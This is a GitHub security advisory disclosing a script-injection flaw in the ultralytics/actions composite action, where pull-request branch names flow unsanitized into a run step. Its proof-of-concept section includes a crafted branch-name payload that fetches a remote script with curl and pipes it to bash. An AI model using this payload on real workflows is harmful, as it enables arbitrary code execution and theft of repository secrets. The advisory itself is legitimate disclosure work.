GHSA-7x29-qqmq-v6qc

Suggest an improvement
Source
https://github.com/advisories/GHSA-7x29-qqmq-v6qc
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-7x29-qqmq-v6qc/GHSA-7x29-qqmq-v6qc.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-7x29-qqmq-v6qc
Related
Published
2024-08-14T20:53:47Z
Modified
2024-11-18T16:27:04Z
Severity
  • 9.3 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N CVSS Calculator
  • 7.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:N CVSS Calculator
Summary
GitHub Actions Script Injection in `ultralytics/actions`
Details

Summary

The Ultralytics action available at https://github.com/marketplace/actions/ultralytics-actions is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the pull_request_target trigger, then an attacker can inject arbitrary code into that workflow using a crafted branch name.

Details

The issue exists because the action.yml is a composite action and uses certain fields by GitHub context expression within a run step:

        echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
        echo "github.ref: ${{ github.ref }}"
        echo "github.head_ref: ${{ github.head_ref }}"
        echo "github.base_ref: ${{ github.base_ref }}"

In this case, github.head_ref and github.event.pull_request.head.ref are user controlled and can be used to inject code.

PoC

  1. Create a fork of any repository that uses ultralytics/actions within a workflow that runs on pull_request_target.
  2. In the fork create a branch as an injection payload, e.g.: Hacked";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash

  3. Create a draft pull request.

  4. If the action is reachable, then achieve arbitrary code execution.

ultra_cve_poc

See my full POC here (https://github.com/AdnaneKhan/UltralyticsPOC/actions/runs/9733997201 and https://github.com/AdnaneKhan/UltralyticsPOC), where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.

Impact

Any workflow that uses the action and runs on pull_request_target is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the GITHUB_TOKEN or steal secrets from the workflow.

Fix

Sanitize the user-controlled variables using environment vars.

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-94"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-14T20:53:47Z"
}
References

Affected packages

GitHub Actions / ultralytics/actions

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.3

Database specific

{
    "last_known_affected_version_range": "<= 0.0.2"
}